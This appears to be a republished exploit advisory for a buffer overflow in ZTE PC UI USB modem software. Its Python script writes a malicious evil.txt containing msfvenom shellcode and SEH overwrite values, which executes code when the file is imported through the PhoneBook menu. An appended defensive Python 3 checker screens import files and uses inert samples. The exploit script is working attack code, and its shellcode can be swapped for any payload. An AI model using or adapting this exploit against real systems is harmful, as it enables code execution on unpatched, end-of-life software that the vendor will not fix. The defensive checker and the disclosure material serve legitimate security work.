ZTE PC UI USB Modem Software - Buffer Overflow
Source: vfocus.net  Author: R-73eN  Published: 2015-09-18
#!/usr/bin/python -w
# Title : ZTE PC UI USB MODEM SOFTWARE Buffer Overflow
# Date : 17/09/2015
# Author : R-73eN
# Tested on : Windows XP SP3 on software Eagle Speed PCW_EAGLEALBp671A1V1.0.0B02
# Since all the PC UI based software shares the same source code, they are all vulnerable. (Confirmed by ZTE)
# The problem exists in the import function at the PhoneBook menu, which doesn't
# validate data, so importing a malformed file leads to code execution.
#
# Triggering the Vulnerability
# Run this Python script, which will save an evil.txt file.
# Open Eagle Speed, go to PhoneBook, click Import and select the evil.txt file.
# A calculator should pop up.
#
# Disclosure Timeline:
# [16/08/2015] - Vendor notified
# [18/08/2015] - Vendor responded asking for more details
# [17/08/2015] - Vendor responded that it will not release a patch since the product is at end of life.
#
# Solution:
# Don't import unknown text files.
#
# Video - https://www.youtube.com/watch?v=jbv1L4TrHTY
#

banner = ""
banner +=" ___ __ ____ _ _ \n"
banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n"
banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n"
banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n"
banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n"
print banner

shellcode = ""
#msfvenom -p windows/exec cmd=calc.exe -f python -b "\x00\x0d\x0a\x3d\x20\x3f"
shellcode += "\xba\x49\xc7\x99\xe5\xda\xd7\xd9\x74\x24\xf4\x5b\x29"
shellcode += "\xc9\xb1\x31\x83\xc3\x04\x31\x53\x0f\x03\x53\x46\x25"
shellcode += "\x6c\x19\xb0\x2b\x8f\xe2\x40\x4c\x19\x07\x71\x4c\x7d"
shellcode += "\x43\x21\x7c\xf5\x01\xcd\xf7\x5b\xb2\x46\x75\x74\xb5"
shellcode += "\xef\x30\xa2\xf8\xf0\x69\x96\x9b\x72\x70\xcb\x7b\x4b"
shellcode += "\xbb\x1e\x7d\x8c\xa6\xd3\x2f\x45\xac\x46\xc0\xe2\xf8"
shellcode += "\x5a\x6b\xb8\xed\xda\x88\x08\x0f\xca\x1e\x03\x56\xcc"
shellcode += "\xa1\xc0\xe2\x45\xba\x05\xce\x1c\x31\xfd\xa4\x9e\x93"
shellcode += "\xcc\x45\x0c\xda\xe1\xb7\x4c\x1a\xc5\x27\x3b\x52\x36"
shellcode += "\xd5\x3c\xa1\x45\x01\xc8\x32\xed\xc2\x6a\x9f\x0c\x06"
shellcode += "\xec\x54\x02\xe3\x7a\x32\x06\xf2\xaf\x48\x32\x7f\x4e"
shellcode += "\x9f\xb3\x3b\x75\x3b\x98\x98\x14\x1a\x44\x4e\x28\x7c"
shellcode += "\x27\x2f\x8c\xf6\xc5\x24\xbd\x54\x83\xbb\x33\xe3\xe1"
shellcode += "\xbc\x4b\xec\x55\xd5\x7a\x67\x3a\xa2\x82\xa2\x7f\x5c"
shellcode += "\xc9\xef\x29\xf5\x94\x65\x68\x98\x26\x50\xae\xa5\xa4"
shellcode += "\x51\x4e\x52\xb4\x13\x4b\x1e\x72\xcf\x21\x0f\x17\xef"
shellcode += "\x96\x30\x32\x8c\x79\xa3\xde\x7d\x1c\x43\x44\x82"

filename="evil.txt"
nSEH = "\xEB\x06\x90\x90"
SEH = "\xab\x11\x9f\x0f"
buffer = "A" * 3136 + nSEH + SEH + shellcode + "D" * (2856 - len(shellcode))

textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()
print "[+] Evil.txt created successfully [+]"
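
The advisory's only mitigation is to avoid importing unknown text files, and the vendor will not patch the import function. As an added example (not part of the original advisory or the vendor's software), the Python 3 check below pre-screens a phone book file before it is imported. The 256-byte line limit, the 64-byte run limit and the `name,number` sample layout are assumptions, and the malformed sample reuses only the lengths from the script above with inert filler bytes.

```python
import re

# Assumed policy (not from the advisory): a phone book line is short text.
MAX_LINE_BYTES = 256
MAX_RUN = 64  # longest tolerated run of one repeated byte
_RUN = re.compile(rb"(.)\1{%d,}" % MAX_RUN, re.S)
# C0 control bytes other than TAB/LF/CR, plus DEL.
_CTRL = re.compile(rb"[\x00-\x08\x0b\x0c\x0e-\x1f\x7f]")


def inspect_import_file(data, max_line=MAX_LINE_BYTES):
    """Return (line_number, reason, detail) findings for raw file bytes."""
    findings = []
    for lineno, raw in enumerate(data.split(b"\n"), 1):
        line = raw.rstrip(b"\r")
        if len(line) > max_line:
            findings.append((lineno, "line-too-long", len(line)))
        ctrl = _CTRL.findall(line)
        if ctrl:
            findings.append((lineno, "control-bytes", len(ctrl)))
        run = _RUN.search(line)
        if run:
            findings.append((lineno, "repeated-byte-run", len(run.group(0))))
    return findings


def is_safe_to_import(data):
    """True only when no check fired on any line."""
    return not inspect_import_file(data)


# Constructed samples. BENIGN uses an assumed "name,number" layout.
BENIGN = b"Alice,+355690000001\r\nBob,+355690000002\r\n"
# Same shape as the file described above (3136 filler bytes, two 4-byte
# fields, 2856 trailing bytes, all on one line) with inert placeholder bytes.
MALFORMED = b"A" * 3136 + b"\x01" * 4 + b"\x02" * 4 + b"D" * 2856

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN), ("malformed", MALFORMED)):
        print(name, is_safe_to_import(sample), inspect_import_file(sample))
```

Any single finding is enough to refuse the import; the limits should be tuned to the longest legitimate entry seen in real phone book exports.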